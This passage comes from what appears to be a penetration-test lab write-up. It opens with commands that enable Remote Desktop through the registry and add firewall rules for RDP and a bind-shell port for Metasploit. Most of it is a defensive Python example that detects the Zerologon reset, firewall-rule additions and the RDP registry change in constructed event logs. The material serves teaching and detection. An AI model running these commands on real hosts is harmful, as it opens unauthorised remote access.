Enable 3389, allow 3389 through the firewall, and connect:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
Getting ready to bring it into msf; the firewall is on here too, so add the rule first:
netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow
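Three of the steps in this write-up leave distinct traces on the hosts: the Zerologon password reset (a 4742 "computer account was changed" event on the DC whose subject is ANONYMOUS LOGON and whose target is the DC's own machine account), each netsh rule addition (a 4946 "rule was added" event from the Windows Firewall audit category, here and in section 3), and the fDenyTSConnections registry flip in section 4 (a Sysmon Event ID 13 registry value set, where Sysmon is deployed). As an added example, not part of the original write-up, the Python below runs those three detections over constructed event records; the field names follow the Windows EventData names, but the records themselves, the Sysmon record shape, the DC account list (taken from the net group output above) and the approved-rule baseline are the editor's assumptions.

```python
# Constructed Security-log / Sysmon records, already flattened to dicts the way
# a log pipeline would emit them. Values are made up to mirror the steps above.
SAMPLE_EVENTS = [
    {"EventID": 4742, "Computer": "WIN2019.vulntarget.com", "SubjectUserSid": "S-1-5-7",
     "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "WIN2019$",
     "TargetDomainName": "VULNTARGET", "PasswordLastSet": "1/26/2022 1:57:40 AM"},
    {"EventID": 4742, "Computer": "WIN2019.vulntarget.com", "SubjectUserSid": "S-1-5-18",
     "SubjectUserName": "WIN2016$", "TargetUserName": "WIN2016$",
     "TargetDomainName": "VULNTARGET", "PasswordLastSet": "1/20/2022 3:00:00 AM"},
    {"EventID": 4946, "Computer": "WIN2016.vulntarget.com", "ProfileChanged": "All",
     "RuleId": "{constructed-rule-id-1}", "RuleName": "bind tcp"},
    {"EventID": 4946, "Computer": "WIN2019.vulntarget.com", "ProfileChanged": "All",
     "RuleId": "{constructed-rule-id-2}", "RuleName": "Remote Desktop"},
    {"EventID": 4946, "Computer": "WIN2019.vulntarget.com", "ProfileChanged": "Domain",
     "RuleId": "{constructed-rule-id-3}", "RuleName": "Core Networking - DNS (UDP-Out)"},
    {"EventID": 13, "Channel": "Microsoft-Windows-Sysmon/Operational",
     "Computer": "WIN2019.vulntarget.com", "Image": "C:\\Windows\\system32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 4624, "Computer": "WIN2019.vulntarget.com", "TargetUserName": "Administrator",
     "LogonType": "3"},
]

DC_ACCOUNTS = {"WIN2019$"}  # from the 'net group "domain controllers"' output above
APPROVED_FIREWALL_RULES = {"Core Networking - DNS (UDP-Out)"}  # constructed baseline
ANONYMOUS_LOGON_SID = "S-1-5-7"


def is_zerologon_reset(ev, dc_accounts):
    """4742 on a DC machine account performed by ANONYMOUS LOGON: the reset that
    CVE-2020-1472 performs is unauthenticated, so the subject is S-1-5-7."""
    return (ev.get("EventID") == 4742
            and ev.get("TargetUserName", "").upper() in dc_accounts
            and (ev.get("SubjectUserSid") == ANONYMOUS_LOGON_SID
                 or ev.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON"))


def is_unapproved_firewall_rule(ev, approved):
    """4946: a Windows Firewall rule was added; anything outside the baseline is reviewed."""
    return ev.get("EventID") == 4946 and ev.get("RuleName") not in approved


def is_rdp_enabled_by_registry(ev):
    """Sysmon 13: fDenyTSConnections set to 0 turns Remote Desktop on."""
    target = ev.get("TargetObject", "").lower().replace("/", "\\")
    return (ev.get("EventID") == 13
            and ev.get("Channel", "").startswith("Microsoft-Windows-Sysmon")
            and target.endswith("\\terminal server\\fdenytsconnections")
            and "0x00000000" in ev.get("Details", ""))


def detect(events, dc_accounts=DC_ACCOUNTS, approved=APPROVED_FIREWALL_RULES):
    """Return (rule, computer, detail) tuples for every matching event, in log order."""
    alerts = []
    for ev in events:
        host = ev.get("Computer", "?")
        if is_zerologon_reset(ev, dc_accounts):
            alerts.append(("zerologon_machine_password_reset", host,
                           f"{ev['TargetUserName']} password reset by ANONYMOUS LOGON"))
        elif is_unapproved_firewall_rule(ev, approved):
            alerts.append(("firewall_rule_added", host, f"rule {ev['RuleName']!r} not in baseline"))
        elif is_rdp_enabled_by_registry(ev):
            alerts.append(("rdp_enabled_via_registry", host, f"by {ev.get('Image', '?')}"))
    return alerts


if __name__ == "__main__":
    for rule, host, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:36} {host:24} {detail}")
```

The 4742 check needs "Audit Computer Account Management" enabled on the DCs and the 4946 check needs "Audit MPSSVC Rule-Level Policy Change"; neither is on in a default audit policy, which is why this lab's hosts would record nothing for these steps unless the policy is set first.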